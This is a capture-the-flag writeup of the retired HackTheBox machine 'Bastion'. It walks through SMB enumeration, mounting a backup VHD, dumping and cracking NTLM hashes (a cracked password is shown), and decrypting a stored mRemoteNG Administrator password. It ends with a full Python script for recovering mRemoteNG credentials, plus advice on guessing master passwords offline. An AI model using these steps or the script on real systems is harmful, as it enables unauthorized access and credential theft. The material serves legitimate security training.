# 【Easy/Windows】Bastion Writeup(HackTheBox)

*2022-08-20* · Tags: HackTheBox (en), Windows (en), EasyBox (en), English

> This page has been machine-translated from the [original page](/hackthebox-windows-bastion).

I am studying security using "Hack The Box," a penetration testing learning platform. My current rank on Hack The Box is Pro Hacker at the time of writing.

![Hack The Box](/static/b46c3deeba8d74f48e014674ce163828/c8042/327080.png)

This is a writeup for the HackTheBox retired machine "Bastion."

## About This Article

**The content of this article is not intended to promote any actions that violate social order.**

Please note in advance that attempting to attack environments you do not own or have not been authorized to access may violate the Act on Prohibition of Unauthorized Computer Access (Unauthorized Access Prohibition Act).

All opinions expressed here are my own and do not represent any organization I belong to.

## Table of Contents

- [About This Article](#about-this-article)
- [Enumeration](#enumeration)
- [Analyzing the VHD File](#analyzing-the-vhd-file)
- [Privilege Escalation](#privilege-escalation)

## Enumeration

Starting with the usual reliable port scan.

```bash
# Add the target IP to /etc/hosts, then run a fast scan.
# Double quotes are needed so that $RHOST expands; inside single quotes sed would see a literal "$RHOST".
$ sudo sed -i "s/^[0-9].*$RHOST/10.10.10.134 $RHOST/g" /etc/hosts
$ nmap -sV -sC -Pn -T4 $RHOST | tee nmap1.txt

# All ports
$ nmap -p- $RHOST -Pn -sC -sV -A | tee nmap_max.txt
```

Quite a few things appear to be open.

```text
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-08-14T07:08:23
|_  start_date: 2022-08-14T07:05:13
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-08-14T09:08:24+02:00
|_clock-skew: mean: -39m57s, deviation: 1h09m13s, median: 0s
```

Let's start by enumerating SMB.

```bash
$ enum4linux $RHOST
# Nothing of note found

$ crackmapexec smb $RHOST
SMB         10.10.10.134    445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)

$ smbmap -H $RHOST -d WORKGROUP -u guest
```

The smbmap results were as shown in the following image.

![smbmap results](/static/c1df9318e09f0e87d8effcb24aa04ab0/c4b7c/image-20220814161720294.png)

Since `smb2-security-mode` was 3.1.1, I thought SMBGhost might work, but the exploit did not function properly.

CVE-2020-0796 (SMBGhost) affects only the SMB 3.1.1 compression feature introduced in Windows 10 and Windows Server versions 1903 and 1909; build 14393 is Server 2016, which does not implement it, so the dialect alone was a false lead.

Continuing the enumeration, I found that `NT LM 0.12 (SMBv1)` was running.

```bash
$ nmap -p139,445 --script smb-protocols 10.10.10.134
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-protocols: 
|   dialects: 
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
```

I tried EternalBlue, but got an SMB SessionError and it did not work.

```text
impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
```

Reviewing the enumeration results again, I noticed there was a share called "Backups" in addition to the default shares.

Connecting with smbclient as shown below (`-N` for a null session, since the share allows guest access), I was able to browse the shared files.

```bash
$ smbclient -N \\\\10.10.10.134\\Backups
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Aug 14 01:34:58 2022
  ..                                  D        0  Sun Aug 14 01:34:58 2022
  GYGJLRPNZM                          D        0  Sun Aug 14 00:16:02 2022
  NAZTUYVCIR                          D        0  Sun Aug 14 01:34:58 2022
  note.txt                           AR      116  Tue Apr 16 03:10:09 2019
  OYSNDCHGMR                          D        0  Sun Aug 14 01:34:34 2022
  SDT65CB.tmp                         A        0  Fri Feb 22 04:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 04:44:02 2019

                5638911 blocks of size 4096. 1175622 blocks available
```

Following the WindowsImageBackup directory tree, I found VHD files that appeared to be a machine backup.

However, smbclient's default per-operation timeout is 20 seconds, making it impossible to download the large VHD file. Raising the timeout (the `timeout` command takes seconds) with the following command allowed me to download it.

```bash
smb: \> timeout 200000
```

## Analyzing the VHD File

Downloading the larger VHD took several hours, but the intended solution appears to be remote mounting rather than downloading.

Using qemu-nbd, the VHD on the CIFS-mounted share can be attached as a block device and its NTFS partition mounted read-only, so nothing has to be copied first.

[How to mount a VirtualBox VDI image | Be the signal](https://bethesignal.org/blog/2011/01/05/how-to-mount-virtualbox-vdi-image/)

```bash
mkdir /mnt/L4mpje-PC
mkdir /mnt/vhd
modprobe nbd
# mount.cifs prompts for a password here; press Enter (or add -o guest) for the guest-accessible share
mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/
# -r exposes the image read-only, -c connects it to /dev/nbd0
qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
mount -r /dev/nbd0p1 /mnt/vhd
# when done: umount /mnt/vhd && qemu-nbd -d /dev/nbd0
```

I explored the mounted VHD and obtained NTLM hashes.

Further cracking the hash with hashcat allowed me to recover the user's password.

```bash
$ docker run --net host --rm -it -v `pwd`:/root impacket
# SAM and SYSTEM are the registry hives copied from /mnt/vhd/Windows/System32/config/ on the mounted VHD;
# LOCAL tells secretsdump to parse the hive files instead of connecting to a host
$ secretsdump.py -sam SAM -system SYSTEM LOCAL
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password (blank or disabled accounts),
# so Administrator and Guest are not worth cracking; the user's hash is the one to feed to hashcat
$ hashcat -a 0 -m 1000 ./ntlm /usr/share/wordlists/rockyou.txt
26112010952d963c8dc4217daec986d9:bureaulampje
```

![hashcat result](/static/131e962484717c0d4af8df5cb915bd7b/08115/image-20220814215754775.png)

## Privilege Escalation

I tried running systeminfo to look for vulnerabilities, but it seems I don't have sufficient privileges.

```text
C:\Users\L4mpje>systeminfo
ERROR: Access denied
```

Continuing the enumeration, I found the Administrator's RDP password embedded in the configuration file of an application called mRemoteNG. (mRemoteNG keeps its connection list in `%APPDATA%\mRemoteNG\confCons.xml`; the `Password` attribute of each `Node` is the stored credential. The trailing attributes of the `Node` element are trimmed below.)

```xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" />
</mrng:Connections>
```

The `Password` value is not merely Base64-encoded: it is AES-GCM ciphertext (`EncryptionEngine="AES"`, `BlockCipherMode="GCM"`) under a key derived with PBKDF2 (`KdfIterations="1000"`) from mRemoteNG's default master password `mR3m`, then Base64-encoded. Because no custom master password was set, it can be decrypted offline with the following script.

[mremoteng-decrypt/mremoteng_decrypt.py at master · kmahyyg/mremoteng-decrypt · GitHub](https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py)

Using this password to connect via SSH, I was able to obtain a shell with Administrator privileges.

![Administrator shell over SSH](/static/9abb27afaa501a1317258cd0be1efebe/32056/image-20220814231730643.png)
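The mRemoteNG step in "Privilege Escalation" links to a decryption script but does not show what the Base64 blob actually contains. The following worked example is added to this writeup; it is not the page's code, not mRemoteNG's code, and not the linked `mremoteng_decrypt.py`, although it performs the same operations. It assumes the `cryptography` package is available and that `mR3m` is mRemoteNG's default master password (which it is when the user has set none). The blob layout it implements is `salt(16) | nonce(16) | ciphertext | GCM tag(16)`, with the salt also used as associated data and the key derived by PBKDF2-HMAC-SHA1 with the `KdfIterations` count from the file. `PAGE_CONFCONS` is the page's `confCons.xml` with the trimmed `Node` closed and a few cosmetic attributes dropped; the `Protected` and `Password` values are verbatim from the page, so decryption success is verified by the GCM tag rather than by a value assumed here.

```python
"""mRemoteNG confCons.xml password recovery (worked example added to this writeup)."""
import base64
import hashlib
import os
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

DEFAULT_MASTER_PASSWORD = "mR3m"  # mRemoteNG's built-in default when no master password is set
SALT_LEN = NONCE_LEN = TAG_LEN = 16

# The page's confCons.xml (Node closed with "/>" because its trailing attributes were trimmed there).
PAGE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""


def _derive_key(password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA1 to a 256-bit AES key, the derivation mRemoteNG's AES/GCM engine uses."""
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, iterations, dklen=32)


def decrypt_blob(b64_blob: str, password: str, iterations: int) -> str:
    """Decode salt | nonce | ciphertext | tag and decrypt; raises InvalidTag on a wrong password."""
    blob = base64.b64decode(b64_blob)
    if len(blob) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("too short to be an mRemoteNG AES-GCM value")
    salt = blob[:SALT_LEN]
    nonce = blob[SALT_LEN:SALT_LEN + NONCE_LEN]
    ct_and_tag = blob[SALT_LEN + NONCE_LEN:]  # cryptography's AESGCM expects ciphertext||tag
    return AESGCM(_derive_key(password, salt, iterations)).decrypt(nonce, ct_and_tag, salt).decode("utf-8")


def encrypt_blob(plaintext: str, password: str, iterations: int) -> str:
    """Inverse of decrypt_blob with a fresh random salt and nonce (useful for building fixtures)."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    ct_and_tag = AESGCM(_derive_key(password, salt, iterations)).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_and_tag).decode("ascii")


def check_master_password(xml_text: str, password: str = DEFAULT_MASTER_PASSWORD) -> Optional[str]:
    """The root's Protected attribute is a marker string encrypted under the master password, so a
    successful tag check proves the password is right. Returns the marker, or None if it is wrong."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    try:
        return decrypt_blob(root.get("Protected", ""), password, int(root.get("KdfIterations", "1000")))
    except InvalidTag:
        return None


def decrypt_confcons(xml_text: str, password: str = DEFAULT_MASTER_PASSWORD) -> List[Dict[str, str]]:
    """Walk every <Node> that carries a Password and return the connection details in cleartext."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    iterations = int(root.get("KdfIterations", "1000"))
    results = []
    for node in root.iter("Node"):  # Node elements are not namespaced, unlike the root
        if not node.get("Password"):
            continue
        results.append({
            "name": node.get("Name", ""), "username": node.get("Username", ""),
            "hostname": node.get("Hostname", ""), "protocol": node.get("Protocol", ""),
            "password": decrypt_blob(node.get("Password", ""), password, iterations),
        })
    return results


if __name__ == "__main__":
    print("master password accepted:", check_master_password(PAGE_CONFCONS) is not None)
    for entry in decrypt_confcons(PAGE_CONFCONS):
        print(entry)
```

Check the master password first: if `check_master_password` returns None the user set a custom one, and the `Protected` blob (18-byte plaintext, so a short fixed marker) is then the cheapest target for an offline guess loop, since each attempt costs one PBKDF2 derivation plus one GCM tag check.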